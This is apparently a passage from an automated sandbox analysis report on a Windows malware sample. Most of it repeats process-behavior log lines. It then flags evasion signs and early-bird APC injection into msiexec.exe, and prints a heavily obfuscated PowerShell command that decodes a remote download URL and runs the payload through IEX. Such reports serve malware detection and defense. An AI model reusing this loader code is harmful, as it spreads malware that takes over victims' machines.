              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5489Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4447Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5996Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3769Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3912Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2080Thread sleep time: -2767011611056431s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: powershell.exe, 00000001.00000002.1944944407.000001DEF4100000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWmple%SystemRoot%\system32\mswsock.dllWebServiceProxy",
              Source: msiexec.exe, 00000008.00000002.2423629116.00000000058CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: msiexec.exe, 00000008.00000002.2423629116.000000000586A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWB
              Source: wscript.exe, 00000000.00000002.1723980646.000002109EF31000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o@
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Early bird code injection technique detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_7100.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7100, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6288, type: MEMORYSTR
              Queues an APC in another process (thread injection)
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3C60000Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Tnkningen Acnes udgangsstrm Lakfernisens Svigefuldere Poplesie Nonpardoning #>;$Harlequinic9='Faineant';<#Binit Reveree Opnaaes #>;$Stooled=$Anapstiske+$host.UI; function Katabolize($bevaringernes){If ($Stooled) {$Procenttegnet++;}$Reassignments=$Diamantsliberes+$bevaringernes.'Length'-$Procenttegnet; for( $Forhekselserne=5;$Forhekselserne -lt $Reassignments;$Forhekselserne+=6){$Proempiricist=$Forhekselserne;$Oversigstabeller+=$bevaringernes[$Forhekselserne];$Udslg120='Telepatis';}$Oversigstabeller;}function Salvierne($Dedentition){ . ($Tdlens) ($Dedentition);}$Diskettestrelserne=Katabolize 'ThesaMPa mio dru zVoldgiBud.ilBurgulSpdetaKbest/Mi nn ';$Klaner='Forda[Shri NFem ieIndtjTFaddl.tantas akebeGe atRwatc,VPo taITotnecMonureDativpGenfuOFiberi UnsiNHen.iTCoticmHo.ltA UncoN F.rsALrke GSpnd EDosshROmgaa]Eskim:Cot a:Pose SUnde.e KvitCProg UO,erirD ughIRundetF rsdyL.ksePOdiumrRet.roHippeTIn ulOM rtyC nonsoKnaldlNonne vuls=Bior ';$Diskettestrelserne+=Katabolize 'Doxog5Strin.Wittd0Cardi Rejs(genneWTrilli FortnCoudrd togeoUnc mwUnsoosRekla BaudrNTr.glT Spag Prakt1Tel,s0 Ansk.Afdan0 uber; Ob.c AflaaWSs eriWhirlnPatos6 Oil.4 macr;Vrtdy Str fxEcba 6Velge4Infri;Decid FlyvrKompovA,jac: Besc1Klipd3Indsp1Fremt.Gensk0boome)rehea DesenGCyanoePre ocKlaphk Me ioGlams/U sco2Gri l0A mbe1o.skr0.rimi0.elik1Humrs0Pseud1Campe SlvbrFComi i T anrIllege Jordf xpreoSlavixAntom/Tendr1Unr c3Tipol1 Funk.Aflir0aut s ';$Klaner+=' Mosa[ Di gNUnknoEGonapTDistr.TypifsSchisEVels.cRansauPa narBevikIFirbltMonadY i plpAppenRhe aaOUdmaat VocaOisenkc FingopreuslPerloT EnhuYSnohaPD milEP,nti] Attr ';$Udekampenes=Katabolize ' S,lvU DispSProgrE SkolrTeglt-Tub pAbeklaGParasEMaskoNIrgrnTkrimi ';$Achinese=Katabolize 'MicrohSlaantMusett NeoppSvlges Stra:Beher/Varme/Pulved acrorAfdrai Mumiv likke Lder.usandgFairboTr ldoConvogSor klAdskieVindi. befcFyldooEvangmPha,a/Anomaupron cRandp?Drivhe strax ResopF lskoHuastrFattitKunde=SokkedFornro,eathwHalakncykell Fondo em haRastld Chl &Tarwoi PiradCallb=i,dit1hottoDSkrifRAarpexSailo- Pres4 andf-Haan skamm,5Sn wb-Diale4 Revn2ExedreMars,c Over5ostre5,emervR.gnfnFrid F SukkOover O Fr sk BagtcDibblNDemagRBodegWBra,dqStrom_Majeux Sen.p A thfVende4,ncureOr el ';$Unprincipal=Katabolize ' Halv> avl ';$Tdlens=Katabolize 'TopkiIFod.aEStr,tXLogom ';$Slideproof='Nkke';$Klaner+='Vaes.:Anstu:SkrivT rainLE uiasDuvet1Promi2Empa. ';$sysker='\Solidifiable.Sch';Salvierne (Katabolize 'Qu en$Underg SettLSabbaO Ca cb.tgjaaPsychLRges,:Srligv ogheE DefesKurert P steBlommuCarnaR L ssoFlycapTorskETransrPolessSpr,g= upe$SporaEStudenMundtvAtomf: SupeAungulp CampPC ystDHaystaHjemltUnz,pA Smaa+Helti$Trosas Eft Y uaegSNonilkFastgeD rsiRLokal ');Salvierne (Katabolize ' ioke$MatroGunswaLRefu ORe isBDrejnAAna klSt,pf:Vomitc DistHReligAI dekiuncreR KoncmTetraEPressNIllusDHunfyi JarnnKo rsGSpec = Siev$ IndgA lalCZoophhEde,hi RewanUncanERverisUncofEDagkJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#tnkningen acnes udgangsstrm lakfernisens svigefuldere poplesie nonpardoning #>;$harlequinic9='faineant';<#binit reveree opnaaes #>;$stooled=$anapstiske+$host.ui; function katabolize($bevaringernes){if ($stooled) {$procenttegnet++;}$reassignments=$diamantsliberes+$bevaringernes.'length'-$procenttegnet; for( $forhekselserne=5;$forhekselserne -lt $reassignments;$forhekselserne+=6){$proempiricist=$forhekselserne;$oversigstabeller+=$bevaringernes[$forhekselserne];$udslg120='telepatis';}$oversigstabeller;}function salvierne($dedentition){ . ($tdlens) ($dedentition);}$diskettestrelserne=katabolize 'thesampa mio dru zvoldgibud.ilburgulspdetakbest/mi nn ';$klaner='forda[shri nfem ieindtjtfaddl.tantas akebege atrwatc,vpo taitotnecmonuredativpgenfuofiberi unsinhen.itcoticmho.lta uncon f.rsalrke gspnd edosshromgaa]eskim:cot a:pose sunde.e kvitcprog uo,erird ughirundetf rsdyl.ksepodiumrret.rohippetin ulom rtyc nonsoknaldlnonne vuls=bior ';$diskettestrelserne+=katabolize 'doxog5strin.wittd0cardi rejs(gennewtrilli fortncoudrd togeounc mwunsoosrekla baudrntr.glt spag prakt1tel,s0 ansk.afdan0 uber; ob.c aflaawss eriwhirlnpatos6 oil.4 macr;vrtdy str fxecba 6velge4infri;decid flyvrkompova,jac: besc1klipd3indsp1fremt.gensk0boome)rehea desengcyanoepre ocklaphk me ioglams/u sco2gri l0a mbe1o.skr0.rimi0.elik1humrs0pseud1campe slvbrfcomi i t anrillege jordf xpreoslavixantom/tendr1unr c3tipol1 funk.aflir0aut s ';$klaner+=' mosa[ di gnunknoegonaptdistr.typifsschisevels.cransaupa narbevikifirbltmonady i plpappenrhe aaoudmaat vocaoisenkc fingopreuslperlot enhuysnohapd milep,nti] attr ';$udekampenes=katabolize ' s,lvu dispsprogre skolrteglt-tub pabeklagparasemaskonirgrntkrimi ';$achinese=katabolize 'microhslaantmusett neoppsvlges stra:beher/varme/pulved acrorafdrai mumiv likke lder.usandgfairbotr ldoconvogsor kladskievindi. befcfyldooevangmpha,a/anomaupron crandp?drivhe strax resopf lskohuastrfattitkunde=sokkedfornro,eathwhalakncykell fondo em harastld chl &tarwoi piradcallb=i,dit1hottodskrifraarpexsailo- pres4 andf-haan skamm,5sn wb-diale4 revn2exedremars,c over5ostre5,emervr.gnfnfrid f sukkoover o fr sk bagtcdibblndemagrbodegwbra,dqstrom_majeux sen.p a thfvende4,ncureor el ';$unprincipal=katabolize ' halv> avl ';$tdlens=katabolize 'topkiifod.aestr,txlogom ';$slideproof='nkke';$klaner+='vaes.:anstu:skrivt rainle uiasduvet1promi2empa. ';$sysker='\solidifiable.sch';salvierne (katabolize 'qu en$underg settlsabbao ca cb.tgjaapsychlrges,:srligv oghee defeskurert p steblommucarnar l ssoflycaptorsketransrpolessspr,g= upe$sporaestudenmundtvatomf: supeaungulp camppc ystdhaystahjemltunz,pa smaa+helti$trosas eft y uaegsnonilkfastged rsirlokal ');salvierne (katabolize ' ioke$matrogunswalrefu ore isbdrejnaana klst,pf:vomitc disthreligai dekiuncrer koncmtetraepressnillusdhunfyi jarnnko rsgspec = siev$ indga lalczoophhede,hi rewanuncanerverisuncofedagk
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" " <#tnkningen acnes udgangsstrm lakfernisens svigefuldere poplesie nonpardoning #>;$harlequinic9='faineant';<#binit reveree opnaaes #>;$stooled=$anapstiske+$host.ui; function katabolize($bevaringernes){if ($stooled) {$procenttegnet++;}$reassignments=$diamantsliberes+$bevaringernes.'length'-$procenttegnet; for( $forhekselserne=5;$forhekselserne -lt $reassignments;$forhekselserne+=6){$proempiricist=$forhekselserne;$oversigstabeller+=$bevaringernes[$forhekselserne];$udslg120='telepatis';}$oversigstabeller;}function salvierne($dedentition){ . ($tdlens) ($dedentition);}$diskettestrelserne=katabolize 'thesampa mio dru zvoldgibud.ilburgulspdetakbest/mi nn ';$klaner='forda[shri nfem ieindtjtfaddl.tantas akebege atrwatc,vpo taitotnecmonuredativpgenfuofiberi unsinhen.itcoticmho.lta uncon f.rsalrke gspnd edosshromgaa]eskim:cot a:pose sunde.e kvitcprog uo,erird ughirundetf rsdyl.ksepodiumrret.rohippetin ulom rtyc nonsoknaldlnonne vuls=bior ';$diskettestrelserne+=katabolize 'doxog5strin.wittd0cardi rejs(gennewtrilli fortncoudrd togeounc mwunsoosrekla baudrntr.glt spag prakt1tel,s0 ansk.afdan0 uber; ob.c aflaawss eriwhirlnpatos6 oil.4 macr;vrtdy str fxecba 6velge4infri;decid flyvrkompova,jac: besc1klipd3indsp1fremt.gensk0boome)rehea desengcyanoepre ocklaphk me ioglams/u sco2gri l0a mbe1o.skr0.rimi0.elik1humrs0pseud1campe slvbrfcomi i t anrillege jordf xpreoslavixantom/tendr1unr c3tipol1 funk.aflir0aut s ';$klaner+=' mosa[ di gnunknoegonaptdistr.typifsschisevels.cransaupa narbevikifirbltmonady i plpappenrhe aaoudmaat vocaoisenkc fingopreuslperlot enhuysnohapd milep,nti] attr ';$udekampenes=katabolize ' s,lvu dispsprogre skolrteglt-tub pabeklagparasemaskonirgrntkrimi ';$achinese=katabolize 'microhslaantmusett neoppsvlges stra:beher/varme/pulved acrorafdrai mumiv likke lder.usandgfairbotr ldoconvogsor kladskievindi. befcfyldooevangmpha,a/anomaupron crandp?drivhe strax resopf lskohuastrfattitkunde=sokkedfornro,eathwhalakncykell fondo em harastld chl &tarwoi piradcallb=i,dit1hottodskrifraarpexsailo- pres4 andf-haan skamm,5sn wb-diale4 revn2exedremars,c over5ostre5,emervr.gnfnfrid f sukkoover o fr sk bagtcdibblndemagrbodegwbra,dqstrom_majeux sen.p a thfvende4,ncureor el ';$unprincipal=katabolize ' halv> avl ';$tdlens=katabolize 'topkiifod.aestr,txlogom ';$slideproof='nkke';$klaner+='vaes.:anstu:skrivt rainle uiasduvet1promi2empa. ';$sysker='\solidifiable.sch';salvierne (katabolize 'qu en$underg settlsabbao ca cb.tgjaapsychlrges,:srligv oghee defeskurert p steblommucarnar l ssoflycaptorsketransrpolessspr,g= upe$sporaestudenmundtvatomf: supeaungulp camppc ystdhaystahjemltunz,pa smaa+helti$trosas eft y uaegsnonilkfastged rsirlokal ');salvierne (katabolize ' ioke$matrogunswalrefu ore isbdrejnaana klst,pf:vomitc disthreligai dekiuncrer koncmtetraepressnillusdhunfyi jarnnko 